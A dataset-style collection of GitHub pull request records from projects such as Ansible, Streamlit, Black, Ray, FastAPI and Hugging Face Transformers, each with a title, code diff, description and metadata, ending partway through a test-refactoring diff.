the contribution guidelines: https://github.com/scikit-learn/scikit-learn/blob/master/CONTRIBUTING.md#Contributing-Pull-Requests
-->
#### Reference Issue
Fixes #8599
#### What does this implement/fix? Explain your changes.
Fixes what seems to be a typo in a SGD documentation
`x_i` should be `in R^m` (as `n` is the number of features) - better illustrated in the issue ^
| https://api.github.com/repos/scikit-learn/scikit-learn/pulls/8600 | 2017-03-16T14:12:14Z | 2017-03-16T14:21:43Z | 2017-03-16T14:21:43Z | 2017-03-16T14:21:43Z | 256 | scikit-learn/scikit-learn | 45,963 |
nmcli: Use dbus only if it is present | diff --git a/lib/ansible/modules/network/nmcli.py b/lib/ansible/modules/network/nmcli.py
index 86a844c7ee0309..3571c9a77d1b06 100644
--- a/lib/ansible/modules/network/nmcli.py
+++ b/lib/ansible/modules/network/nmcli.py
@@ -524,7 +524,8 @@ class Nmcli(object):
platform='Generic'
distribution=None
- bus=dbus.SystemBus()
+ if HAVE_DBUS:
+ bus=dbus.SystemBus()
# The following is going to be used in dbus code
DEVTYPES={1: "Ethernet",
2: "Wi-Fi",
| ##### ISSUE TYPE
<!--- Pick one below and delete the rest: -->
- Bugfix Pull Request
##### COMPONENT NAME
network/nmcli
##### ANSIBLE VERSION
<!--- Paste verbatim output from “ansible --version” between quotes below -->
```
2.2
```
##### SUMMARY
Call dbus subfunction only if the dbus library is present, otherwise the following error appears:
```
NameError: name 'dbus' is not defined
``` | https://api.github.com/repos/ansible/ansible/pulls/19060 | 2016-12-09T09:51:58Z | 2016-12-09T22:35:55Z | 2016-12-09T22:35:55Z | 2019-04-26T17:40:17Z | 154 | ansible/ansible | 49,425 |
Rolling back #747 | diff --git a/e2e/specs/add_rows.spec.ts b/e2e/specs/add_rows.spec.ts
index e80619b7b150..8dbc64c587de 100644
--- a/e2e/specs/add_rows.spec.ts
+++ b/e2e/specs/add_rows.spec.ts
@@ -35,6 +35,11 @@ describe("st.add_rows", () => {
cy.get(".decoration").invoke("css", "display", "none");
});
+ beforeEach(() => {
+ // Check that the app is fully loaded
+ return cy.get(".element-container").should("have.length", 26);
+ });
+
it("works for all elements that support it", () => {
cy.get(".element-container .stTable").should("have.length", 3);
cy.get(".element-container .stDataFrame").should("have.length", 4);
diff --git a/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-14.snap.png b/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-14.snap.png
index 373e92f15c4b..3f85493d4997 100644
Binary files a/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-14.snap.png and b/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-14.snap.png differ
diff --git a/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-15.snap.png b/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-15.snap.png
index 373e92f15c4b..3f85493d4997 100644
Binary files a/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-15.snap.png and b/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-15.snap.png differ
diff --git a/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-16.snap.png b/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-16.snap.png
index 373e92f15c4b..3f85493d4997 100644
Binary files a/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-16.snap.png and b/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-16.snap.png differ
diff --git a/lib/streamlit/DeltaGenerator.py b/lib/streamlit/DeltaGenerator.py
index d2aae28f8415..c398f5614c60 100644
--- a/lib/streamlit/DeltaGenerator.py
+++ b/lib/streamlit/DeltaGenerator.py
@@ -1595,7 +1595,7 @@ def _check_and_convert_to_indices(options, default_values):
if not isinstance(default_values, list):
default_values = [default_values]
- for value in default_values:
+ for value in default_values:
if value not in options:
raise StreamlitAPIException(
"Every Multiselect default value must exist in options"
@@ -2550,15 +2550,6 @@ def add_rows(self, data=None, **kwargs):
"Method requires exactly one dataset"
)
- # Regenerate chart with data
- if self._last_index == 0:
- if self._delta_type == 'line_chart':
- self.line_chart(data)
- elif self._delta_type == 'bar_chart':
- self.bar_chart(data)
- elif self._delta_type == 'area_chart':
- self.area_chart(data)
-
data, self._last_index = _maybe_melt_data_for_add_rows(
data, self._delta_type, self._last_index
)
| **Issue:** add_rows was not working well for line_chart area_chart and bar_chart
**Description:** Rolling back #747
---
**Contribution License Agreement**
By submiting this pull request you agree that all contributions to this project are made under the Apache 2.0 license.
| https://api.github.com/repos/streamlit/streamlit/pulls/765 | 2019-11-29T17:36:03Z | 2019-11-29T19:45:58Z | 2019-11-29T19:45:58Z | 2019-11-29T19:46:02Z | 866 | streamlit/streamlit | 21,635 |
Update team.json | diff --git a/website/src/data/team.json b/website/src/data/team.json
index 50a981fcac..b0df9eab68 100644
--- a/website/src/data/team.json
+++ b/website/src/data/team.json
@@ -88,6 +88,12 @@
"githubURL": "https://github.com/shahules786",
"imageURL": "https://avatars.githubusercontent.com/u/25312635?v=4"
},
+ "gfjam": {
+ "name": "James Melvin Ebenezer",
+ "title": "Full stack and ML Engineer",
+ "githubURL": "https://github.com/melvinebenezer",
+ "imageURL": "https://avatars.githubusercontent.com/u/6395936?s=40&v=4"
+ },
"jmete": {
"name": "James Mete",
"title": "Data Scientist",
@@ -102,7 +108,7 @@
},
{
"name": "Fullstack developers",
- "members": ["fozziethebeat", "AbdBarho", "notmd", "olliestanley"]
+ "members": ["fozziethebeat", "AbdBarho", "notmd", "olliestanley", "gfjam"]
},
{
"name": "ML engineers",
| Added my details to team.json | https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/2116 | 2023-03-19T10:07:15Z | 2023-03-19T10:35:03Z | 2023-03-19T10:35:03Z | 2023-03-19T10:35:04Z | 300 | LAION-AI/Open-Assistant | 36,997 |
Fix path_empty() | diff --git a/src/black/__init__.py b/src/black/__init__.py
index 90aad220a9c..d83f0e54a72 100644
--- a/src/black/__init__.py
+++ b/src/black/__init__.py
@@ -506,8 +506,9 @@ def path_empty(
"""
Exit if there is no `src` provided for formatting
"""
- if not src and (verbose or not quiet):
- out(msg)
+ if not src:
+ if verbose or not quiet:
+ out(msg)
ctx.exit(0)
| Behavior other than output shouldn't depend on the verbose/quiet option. As far as I can tell this currently has no visible effect, since code after this function is called handles an empty list gracefully. | https://api.github.com/repos/psf/black/pulls/2275 | 2021-05-29T15:04:08Z | 2021-05-29T16:03:09Z | 2021-05-29T16:03:09Z | 2021-05-29T16:03:12Z | 132 | psf/black | 24,435 |
fix vram problems | diff --git a/fooocus_version.py b/fooocus_version.py
index e12744707..e6e36dd5a 100644
--- a/fooocus_version.py
+++ b/fooocus_version.py
@@ -1 +1 @@
-version = '2.0.65'
+version = '2.0.66'
diff --git a/launch.py b/launch.py
index ef13bee5c..fe32c4d67 100644
--- a/launch.py
+++ b/launch.py
@@ -33,23 +33,6 @@ def prepare_environment():
if REINSTALL_ALL or not is_installed("torch") or not is_installed("torchvision"):
run(f'"{python}" -m {torch_command}', "Installing torch and torchvision", "Couldn't install torch", live=True)
- import torch
-
- def detect_gpu_type():
- if torch.cuda.is_available():
- gpu_name = torch.cuda.get_device_name(0)
- if "NVIDIA" in gpu_name:
- return "NVIDIA GPU"
- elif "Radeon" in gpu_name:
- return "AMD GPU"
- else:
- return "Unknown GPU Type"
- else:
- return "No GPU Available"
-
- gpu_type = detect_gpu_type()
- print("Detected GPU Type:", gpu_type)
-
if REINSTALL_ALL or not is_installed("xformers"):
if platform.system() == "Windows":
if platform.python_version().startswith("3.10"):
@@ -60,7 +43,7 @@ def detect_gpu_type():
"You can also check this and build manually: https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Xformers#building-xformers-on-windows-by-duckness")
if not is_installed("xformers"):
exit(0)
- elif platform.system() == "Linux" and gpu_type == 'NVIDIA GPU':
+ elif platform.system() == "Linux":
run_pip(f"install -U -I --no-deps {xformers_package}", "xformers")
if REINSTALL_ALL or not requirements_met(requirements_file):
diff --git a/modules/launch_util.py b/modules/launch_util.py
index 16cf48e29..71a64ff64 100644
--- a/modules/launch_util.py
+++ b/modules/launch_util.py
@@ -91,9 +91,14 @@ def run(command, desc=None, errdesc=None, custom_env=None, live: bool = default_
def run_pip(command, desc=None, live=default_command_live):
- index_url_line = f' --index-url {index_url}' if index_url != '' else ''
- return run(f'"{python}" -m pip {command} --prefer-binary{index_url_line}', desc=f"Installing {desc}",
- errdesc=f"Couldn't install {desc}", live=live)
+ try:
+ index_url_line = f' --index-url {index_url}' if index_url != '' else ''
+ return run(f'"{python}" -m pip {command} --prefer-binary{index_url_line}', desc=f"Installing {desc}",
+ errdesc=f"Couldn't install {desc}", live=live)
+ except Exception as e:
+ print(e)
+ print(f'CMD Failed {desc}: {command}')
+ return None
re_requirement = re.compile(r"\s*([-_a-zA-Z0-9]+)\s*(?:==\s*([-+_.a-zA-Z0-9]+))?\s*")
| https://api.github.com/repos/lllyasviel/Fooocus/pulls/437 | 2023-09-19T19:10:27Z | 2023-09-19T19:11:42Z | 2023-09-19T19:11:42Z | 2023-09-19T19:11:45Z | 779 | lllyasviel/Fooocus | 7,288 |
|
Cache aliases to speed up subsequent calls and add support to Fish functions | diff --git a/tests/test_shells.py b/tests/test_shells.py
index c08ee67f0..675cdd354 100644
--- a/tests/test_shells.py
+++ b/tests/test_shells.py
@@ -78,6 +78,12 @@ class TestFish(object):
def shell(self):
return shells.Fish()
+ @pytest.fixture(autouse=True)
+ def Popen(self, mocker):
+ mock = mocker.patch('thefuck.shells.Popen')
+ mock.return_value.stdout.read.return_value = (b'funced\nfuncsave\ngrep')
+ return mock
+
@pytest.mark.parametrize('before, after', [
('pwd', 'pwd'),
('ll', 'll')]) # Fish has no aliases but functions
@@ -98,7 +104,9 @@ def test_and_(self, shell):
assert shell.and_('foo', 'bar') == 'foo; and bar'
def test_get_aliases(self, shell):
- assert shell.get_aliases() == {}
+ assert shell.get_aliases() == {'funced': 'funced',
+ 'funcsave': 'funcsave',
+ 'grep': 'grep'}
@pytest.mark.usefixtures('isfile')
diff --git a/thefuck/shells.py b/thefuck/shells.py
index 2749a1c5b..154311c85 100644
--- a/thefuck/shells.py
+++ b/thefuck/shells.py
@@ -12,8 +12,10 @@
class Generic(object):
+ _aliases = {}
+
def get_aliases(self):
- return {}
+ return self._aliases
def _expand_aliases(self, command_script):
aliases = self.get_aliases()
@@ -62,11 +64,15 @@ def _parse_alias(self, alias):
return name, value
def get_aliases(self):
- proc = Popen('bash -ic alias', stdout=PIPE, stderr=DEVNULL, shell=True)
- return dict(
- self._parse_alias(alias)
- for alias in proc.stdout.read().decode('utf-8').split('\n')
- if alias and '=' in alias)
+ if not self._aliases:
+ proc = Popen('bash -ic alias', stdout=PIPE, stderr=DEVNULL,
+ shell=True)
+ self._aliases = dict(
+ self._parse_alias(alias)
+ for alias in proc.stdout.read().decode('utf-8').split('\n')
+ if alias and '=' in alias)
+
+ return self._aliases
def _get_history_file_name(self):
return os.environ.get("HISTFILE",
@@ -91,6 +97,15 @@ def app_alias(self):
" end\n"
"end")
+ def get_aliases(self):
+ if not self._aliases:
+ proc = Popen('fish -ic functions', stdout=PIPE, stderr=DEVNULL,
+ shell=True)
+ functions = proc.stdout.read().decode('utf-8').strip().split('\n')
+ self._aliases = dict((function, function) for function in functions)
+
+ return self._aliases
+
def _get_history_file_name(self):
return os.path.expanduser('~/.config/fish/fish_history')
@@ -112,11 +127,15 @@ def _parse_alias(self, alias):
return name, value
def get_aliases(self):
- proc = Popen('zsh -ic alias', stdout=PIPE, stderr=DEVNULL, shell=True)
- return dict(
- self._parse_alias(alias)
- for alias in proc.stdout.read().decode('utf-8').split('\n')
- if alias and '=' in alias)
+ if not self._aliases:
+ proc = Popen('zsh -ic alias', stdout=PIPE, stderr=DEVNULL,
+ shell=True)
+ self._aliases = dict(
+ self._parse_alias(alias)
+ for alias in proc.stdout.read().decode('utf-8').split('\n')
+ if alias and '=' in alias)
+
+ return self._aliases
def _get_history_file_name(self):
return os.environ.get("HISTFILE",
@@ -135,11 +154,15 @@ def _parse_alias(self, alias):
return name, value
def get_aliases(self):
- proc = Popen('tcsh -ic alias', stdout=PIPE, stderr=DEVNULL, shell=True)
- return dict(
- self._parse_alias(alias)
- for alias in proc.stdout.read().decode('utf-8').split('\n')
- if alias and '\t' in alias)
+ if not self._aliases:
+ proc = Popen('tcsh -ic alias', stdout=PIPE, stderr=DEVNULL,
+ shell=True)
+ self._aliases = dict(
+ self._parse_alias(alias)
+ for alias in proc.stdout.read().decode('utf-8').split('\n')
+ if alias and '\t' in alias)
+
+ return self._aliases
def _get_history_file_name(self):
return os.environ.get("HISTFILE",
| @nvbn What do you think?
| https://api.github.com/repos/nvbn/thefuck/pulls/215 | 2015-05-22T02:59:38Z | 2015-05-22T13:55:00Z | 2015-05-22T13:55:00Z | 2015-05-22T18:10:40Z | 1,126 | nvbn/thefuck | 30,884 |
Only delete local object in CoreWorkerPlasmaStoreProvider:::WarmupStore | diff --git a/src/ray/core_worker/store_provider/plasma_store_provider.cc b/src/ray/core_worker/store_provider/plasma_store_provider.cc
index 831f2629a9b1e..a8f1162872284 100644
--- a/src/ray/core_worker/store_provider/plasma_store_provider.cc
+++ b/src/ray/core_worker/store_provider/plasma_store_provider.cc
@@ -429,7 +429,7 @@ Status CoreWorkerPlasmaStoreProvider::WarmupStore() {
RAY_RETURN_NOT_OK(Create(nullptr, 8, object_id, rpc::Address(), &data));
RAY_RETURN_NOT_OK(Seal(object_id));
RAY_RETURN_NOT_OK(Release(object_id));
- RAY_RETURN_NOT_OK(Delete({object_id}, false));
+ RAY_RETURN_NOT_OK(Delete({object_id}, true));
return Status::OK();
}
| <!-- Thank you for your contribution! Please review https://github.com/ray-project/ray/blob/master/CONTRIBUTING.rst before opening a pull request. -->
<!-- Please add a reviewer to the assignee section when you create a PR. If you don't have the access to it, we will shortly find a reviewer and assign them to your PR. -->
## Why are these changes needed?
<!-- Please give a short summary of the change and the problem this solves. -->
This object is only put in local object store, no need to broadcast the delete request to all raylets.
Otherwise, there will be perf issues in a large cluster. Because there will be num_nodes * num_workers requests among raylets.
## Related issue number
<!-- For example: "Closes #1234" -->
## Checks
- [ ] I've run `scripts/format.sh` to lint the changes in this PR.
- [ ] I've included any doc changes needed for https://docs.ray.io/en/master/.
- [ ] I've made sure the tests are passing. Note that there might be a few flaky tests, see the recent failures at https://flakey-tests.ray.io/
- Testing Strategy
- [ ] Unit tests
- [ ] Release tests
- [ ] This PR is not tested :(
| https://api.github.com/repos/ray-project/ray/pulls/13788 | 2021-01-29T09:33:11Z | 2021-01-29T12:24:09Z | 2021-01-29T12:24:09Z | 2021-01-29T12:24:12Z | 190 | ray-project/ray | 18,966 |
📌 Pin AnyIO to < 4.0.0 to handle an incompatibility while upgrading to Starlette 0.31.1 | diff --git a/pyproject.toml b/pyproject.toml
index 9b7cca9c95db2..2870b31a5334d 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -44,6 +44,8 @@ dependencies = [
"starlette>=0.27.0,<0.28.0",
"pydantic>=1.7.4,!=1.8,!=1.8.1,!=2.0.0,!=2.0.1,!=2.1.0,<3.0.0",
"typing-extensions>=4.5.0",
+ # TODO: remove this pin after upgrading Starlette 0.31.1
+ "anyio>=3.7.1,<4.0.0",
]
dynamic = ["version"]
| 📌 Pin AnyIO to < 4.0.0 to handle an incompatibility while upgrading to Starlette 0.31.1 | https://api.github.com/repos/tiangolo/fastapi/pulls/10194 | 2023-09-02T15:16:32Z | 2023-09-02T17:03:44Z | 2023-09-02T17:03:44Z | 2023-09-02T17:03:44Z | 190 | tiangolo/fastapi | 23,193 |
Adding experimental_rerun | diff --git a/e2e/scripts/st_experimental_rerun.py b/e2e/scripts/st_experimental_rerun.py
new file mode 100644
index 000000000000..baf2719c10aa
--- /dev/null
+++ b/e2e/scripts/st_experimental_rerun.py
@@ -0,0 +1,30 @@
+# Copyright 2018-2020 Streamlit Inc.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import streamlit as st
+
+
+@st.cache(allow_output_mutation=True)
+def rerun_record():
+ return [0]
+
+
+count = rerun_record()
+count[0] += 1
+
+if count[0] < 4:
+ st.experimental_rerun()
+
+if count[0] >= 4:
+ st.text("Being able to rerun a session is awesome!")
diff --git a/e2e/specs/st_experimental_rerun.spec.ts b/e2e/specs/st_experimental_rerun.spec.ts
new file mode 100644
index 000000000000..5b8fdfa5b206
--- /dev/null
+++ b/e2e/specs/st_experimental_rerun.spec.ts
@@ -0,0 +1,31 @@
+/**
+ * @license
+ * Copyright 2018-2020 Streamlit Inc.
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+/// <reference types="cypress" />
+
+describe("st.experimental_rerun", () => {
+ before(() => {
+ cy.visit("http://localhost:3000/");
+ });
+
+ it("restarts the session when invoked", () => {
+ cy.get(".element-container .stText").should(
+ "contain",
+ "Being able to rerun a session is awesome!"
+ );
+ });
+});
diff --git a/lib/streamlit/__init__.py b/lib/streamlit/__init__.py
index d60c766f37ed..cdcf7797bc92 100644
--- a/lib/streamlit/__init__.py
+++ b/lib/streamlit/__init__.py
@@ -76,6 +76,8 @@
from streamlit.report_thread import add_report_ctx as _add_report_ctx
from streamlit.report_thread import get_report_ctx as _get_report_ctx
from streamlit.script_runner import StopException
+from streamlit.script_runner import RerunException as _RerunException
+from streamlit.script_request_queue import RerunData as _RerunData
from streamlit.errors import StreamlitAPIException
from streamlit.proto import BlockPath_pb2 as _BlockPath_pb2
from streamlit.proto import ForwardMsg_pb2 as _ForwardMsg_pb2
@@ -507,3 +509,17 @@ def stop():
"""
raise StopException()
+
+
+def experimental_rerun():
+ """Rerun the script immediately.
+
+ When `st.experimental_rerun()` is called, the script is halted - no
+ more statements will be run, and the script will be queued to re-run
+ from the top.
+
+ If this function is called outside of Streamlit, it will raise an
+ Exception.
+ """
+
+ raise _RerunException(_RerunData(None))
diff --git a/scripts/run_bare_integration_tests.py b/scripts/run_bare_integration_tests.py
index abb0d95394e2..df267e7515ba 100755
--- a/scripts/run_bare_integration_tests.py
+++ b/scripts/run_bare_integration_tests.py
@@ -36,6 +36,10 @@
EXCLUDED_FILENAMES = set() # type: Set[str]
+# st_experimental_rerun.py calls st.experimental_rerun which raises a
+# RerunException when called within plain Python.
+EXCLUDED_FILENAMES.add("st_experimental_rerun.py")
+
# Since there is not DISPLAY set (and since Streamlit is not actually running
# and fixing Matplotlib in these tests), we set the MPL backend to something
# that doesn't require a display.
| **Issue:**
Fixes https://github.com/streamlit/streamlit/issues/653
**Description:**
Added `st.experimental_rerun` and `st.experimental_get_session_id`. Given that rerun needed access to the server I chose to make the relevant test be within the e2e testing suite. This e2e test undergoes a few reruns within a thread, and then a couple more just within the main streamlit instance. | https://api.github.com/repos/streamlit/streamlit/pulls/2060 | 2020-09-29T13:00:50Z | 2020-10-13T22:00:32Z | 2020-10-13T22:00:32Z | 2021-07-24T00:36:45Z | 1,137 | streamlit/streamlit | 21,963 |
Bypass Lexicon subdomain resolution in Lexicon-based DNS plugins | diff --git a/certbot/certbot/plugins/dns_common_lexicon.py b/certbot/certbot/plugins/dns_common_lexicon.py
index 6e07e6dc4c7..be94e191baf 100644
--- a/certbot/certbot/plugins/dns_common_lexicon.py
+++ b/certbot/certbot/plugins/dns_common_lexicon.py
@@ -198,6 +198,10 @@ def _build_lexicon_config(self, domain: str) -> ConfigResolver:
dict_config = {
'domain': domain,
+ # We bypass Lexicon subdomain resolution by setting the 'delegated' field in the config
+ # to the value of the 'domain' field itself. Here we consider that the domain passed to
+ # _build_lexicon_config() is already the exact subdomain of the actual DNS zone to use.
+ 'delegated': domain,
'provider_name': self._provider_name,
'ttl': self._ttl,
self._provider_name: {item[2]: self._credentials.conf(item[0])
| As always, brittle code breaks first.
The Lexicon-based DNS plugins use a mechanism to determine which actual segment of the input domain is actually the DNS zone in which the DNS-01 challenge has to be initiated (eg. `subdomain.domain.com` or `domain.com` for input `subdomain.domain.com`): they tries recursively to configure Lexicon and initiate authentication from the most specific to most generic domain segment, and select the first segment where Lexicon stop erroring out.
This mechanism broke with #9746 because now the plugins call Lexicon client instead of the underlying providers, and the client makes guess on the actual domain requested. Typically for `subdomain.domain.com` it will actually try to authenticate against `domain.com`, and so the mechanism above does not work anymore.
This PR fixes the issue by using the `delegated` field in Lexicon config each time the plugin needs it. This field is designed for this kind of purpose: it will instruct Lexicon what is the actual DNS zone domain instead of guessing it.
I tested the change with one of my OVH account. The expected behavior is re-established and the plugin is able to test `subdomain.domain.com` then `domain.com` as before.
Fixes #9791
Fixes #9818 | https://api.github.com/repos/certbot/certbot/pulls/9821 | 2023-10-27T08:12:18Z | 2023-10-27T17:04:41Z | 2023-10-27T17:04:40Z | 2023-10-27T17:04:41Z | 240 | certbot/certbot | 3,575 |
Support OpenAI's new models. | diff --git a/interpreter/terminal_interface/start_terminal_interface.py b/interpreter/terminal_interface/start_terminal_interface.py
index 00471c931..a7f53e95f 100644
--- a/interpreter/terminal_interface/start_terminal_interface.py
+++ b/interpreter/terminal_interface/start_terminal_interface.py
@@ -357,15 +357,15 @@ def start_terminal_interface(interpreter):
### Set some helpful settings we know are likely to be true
- if interpreter.llm.model == "gpt-4-1106-preview":
+ if interpreter.llm.model.startswith("gpt-4") or interpreter.llm.model.startswith("openai/gpt-4"):
if interpreter.llm.context_window is None:
interpreter.llm.context_window = 128000
if interpreter.llm.max_tokens is None:
interpreter.llm.max_tokens = 4096
if interpreter.llm.supports_functions is None:
- interpreter.llm.supports_functions = True
+ interpreter.llm.supports_functions = False if "vision" in interpreter.llm.model else True
- if interpreter.llm.model == "gpt-3.5-turbo-1106":
+ if interpreter.llm.model.startswith("gpt-3.5-turbo") or interpreter.llm.model.startswith("openai/gpt-3.5-turbo"):
if interpreter.llm.context_window is None:
interpreter.llm.context_window = 16000
if interpreter.llm.max_tokens is None:
| ### Describe the changes you have made:
Add default context window and max tokens configs for OpenAI's new models: `gpt-4-turbo-preview`, `gpt-4-0125-preview`, and `gpt-4-1106-vision-preview`.
### Reference any relevant issues (e.g. "Fixes #000"):
If we can keep these configs updated with as more models as possible, maybe can avoid issues like #915
### Pre-Submission Checklist (optional but appreciated):
- [x] I have included relevant documentation updates (stored in /docs)
- [x] I have read `docs/CONTRIBUTING.md`
- [x] I have read `docs/ROADMAP.md`
### OS Tests (optional but appreciated):
- [x] Tested on Windows
- [x] Tested on MacOS
- [x] Tested on Linux
| https://api.github.com/repos/OpenInterpreter/open-interpreter/pulls/1099 | 2024-03-19T07:05:22Z | 2024-03-24T07:49:41Z | 2024-03-24T07:49:41Z | 2024-03-24T07:53:04Z | 322 | OpenInterpreter/open-interpreter | 40,915 |
Add wav2letter | diff --git a/README.md b/README.md
index 358458b3..7ac4b5b6 100644
--- a/README.md
+++ b/README.md
@@ -614,6 +614,7 @@ Further resources:
* [sfm](https://github.com/marcoscoffier/lua---sfm) - A bundle adjustment/structure from motion package.
* [fex](https://github.com/koraykv/fex) - A package for feature extraction in Torch. Provides SIFT and dSIFT modules.
* [OverFeat](https://github.com/sermanet/OverFeat) - A state-of-the-art generic dense feature extractor.
+ * [wav2letter](https://github.com/facebookresearch/wav2letter) - a simple and efficient end-to-end Automatic Speech Recognition (ASR) system from Facebook AI Research.
* [Numeric Lua](http://numlua.luaforge.net/)
* [Lunatic Python](http://labix.org/lunatic-python)
* [SciLua](http://scilua.org/)
| https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/464 | 2018-01-01T21:01:34Z | 2018-01-08T21:12:48Z | 2018-01-08T21:12:48Z | 2020-10-02T09:30:54Z | 234 | josephmisiti/awesome-machine-learning | 52,532 |
|
[extensions/openai] Support undocumented base64 'encoding_format' param for compatibility with official OpenAI client | diff --git a/extensions/openai/script.py b/extensions/openai/script.py
index c168ec95b0..9eb35a4648 100644
--- a/extensions/openai/script.py
+++ b/extensions/openai/script.py
@@ -1,4 +1,6 @@
+import base64
import json
+import numpy as np
import os
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
@@ -45,6 +47,20 @@ def clamp(value, minvalue, maxvalue):
return max(minvalue, min(value, maxvalue))
+def float_list_to_base64(float_list):
+ # Convert the list to a float32 array that the OpenAPI client expects
+ float_array = np.array(float_list, dtype="float32")
+
+ # Get raw bytes
+ bytes_array = float_array.tobytes()
+
+ # Encode bytes into base64
+ encoded_bytes = base64.b64encode(bytes_array)
+
+ # Turn raw base64 encoded bytes into ASCII
+ ascii_string = encoded_bytes.decode('ascii')
+ return ascii_string
+
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path.startswith('/v1/models'):
@@ -435,7 +451,13 @@ def do_POST(self):
embeddings = embedding_model.encode(input).tolist()
- data = [{"object": "embedding", "embedding": emb, "index": n} for n, emb in enumerate(embeddings)]
+ def enc_emb(emb):
+ # If base64 is specified, encode. Otherwise, do nothing.
+ if body.get("encoding_format", "") == "base64":
+ return float_list_to_base64(emb)
+ else:
+ return emb
+ data = [{"object": "embedding", "embedding": enc_emb(emb), "index": n} for n, emb in enumerate(embeddings)]
response = json.dumps({
"object": "list",
| The official Python OpenAI API client uses an undocumented `encoding_format` parameter on the `/v1/embeddings` endpoint by default.
https://github.com/openai/openai-python/blob/d6fa3bfaae69d639b0dd2e9251b375d7070bbef1/openai/api_resources/embedding.py#L25-L29
This PR adds support for the `encoding_format` parameter to maintain support as a drop-in replacement for the OpenAI API. Without this parameter, [llama_index](https://github.com/jerryjliu/llama_index), and possibly other langchain apps, may fail to work. | https://api.github.com/repos/oobabooga/text-generation-webui/pulls/1876 | 2023-05-07T05:06:30Z | 2023-05-09T01:31:34Z | 2023-05-09T01:31:34Z | 2023-05-09T01:31:35Z | 426 | oobabooga/text-generation-webui | 26,349 |
Update README.md. There is "of" twice. | diff --git a/README.md b/README.md
index 03353b3fc..1f19580f2 100644
--- a/README.md
+++ b/README.md
@@ -92,7 +92,7 @@
- A common language (for the two ends to understand)
- A way to address who do you want to communicate with
- - A Connection (so the content of of the communication can reach the recipients)
+ - A Connection (so the content of the communication can reach the recipients)
</b></details>
<details>
| Update README.md to fix the minor mistake. | https://api.github.com/repos/bregman-arie/devops-exercises/pulls/284 | 2022-09-07T00:13:08Z | 2022-09-07T01:32:14Z | 2022-09-07T01:32:14Z | 2022-09-07T01:32:14Z | 125 | bregman-arie/devops-exercises | 17,672 |
Deal with multiple choice in common tests | diff --git a/tests/test_modeling_bert.py b/tests/test_modeling_bert.py
index 276ed056c7d24..ed42031232bd2 100644
--- a/tests/test_modeling_bert.py
+++ b/tests/test_modeling_bert.py
@@ -407,6 +407,7 @@ class BertModelTest(ModelTesterMixin, unittest.TestCase):
(
BertModel,
BertForMaskedLM,
+ BertForMultipleChoice,
BertForNextSentencePrediction,
BertForPreTraining,
BertForQuestionAnswering,
diff --git a/tests/test_modeling_common.py b/tests/test_modeling_common.py
index ceca9d43eae52..ccbbf145f4d32 100644
--- a/tests/test_modeling_common.py
+++ b/tests/test_modeling_common.py
@@ -37,6 +37,7 @@
BertModel,
BertConfig,
BERT_PRETRAINED_MODEL_ARCHIVE_LIST,
+ MODEL_FOR_MULTIPLE_CHOICE_MAPPING,
top_k_top_p_filtering,
)
@@ -62,6 +63,14 @@ class ModelTesterMixin:
test_missing_keys = True
is_encoder_decoder = False
+ def _prepare_for_class(self, inputs_dict, model_class):
+ if model_class in MODEL_FOR_MULTIPLE_CHOICE_MAPPING.values():
+ return {
+ k: v.unsqueeze(1).expand(-1, self.model_tester.num_choices, -1).contiguous()
+ for k, v in inputs_dict.items()
+ }
+ return inputs_dict
+
def test_save_load(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
@@ -70,7 +79,7 @@ def test_save_load(self):
model.to(torch_device)
model.eval()
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
out_2 = outputs[0].cpu().numpy()
out_2[np.isnan(out_2)] = 0
@@ -79,7 +88,7 @@ def test_save_load(self):
model = model_class.from_pretrained(tmpdirname)
model.to(torch_device)
with torch.no_grad():
- after_outputs = model(**inputs_dict)
+ after_outputs = model(**self._prepare_for_class(inputs_dict, model_class))
# Make sure we don't have nans
out_1 = after_outputs[0].cpu().numpy()
@@ -109,8 +118,8 @@ def test_determinism(self):
model.to(torch_device)
model.eval()
with torch.no_grad():
- first = model(**inputs_dict)[0]
- second = model(**inputs_dict)[0]
+ first = model(**self._prepare_for_class(inputs_dict, model_class))[0]
+ second = model(**self._prepare_for_class(inputs_dict, model_class))[0]
out_1 = first.cpu().numpy()
out_2 = second.cpu().numpy()
out_1 = out_1[~np.isnan(out_1)]
@@ -136,7 +145,7 @@ def test_attention_outputs(self):
model.to(torch_device)
model.eval()
with torch.no_grad():
- outputs = model(**inputs_dict)
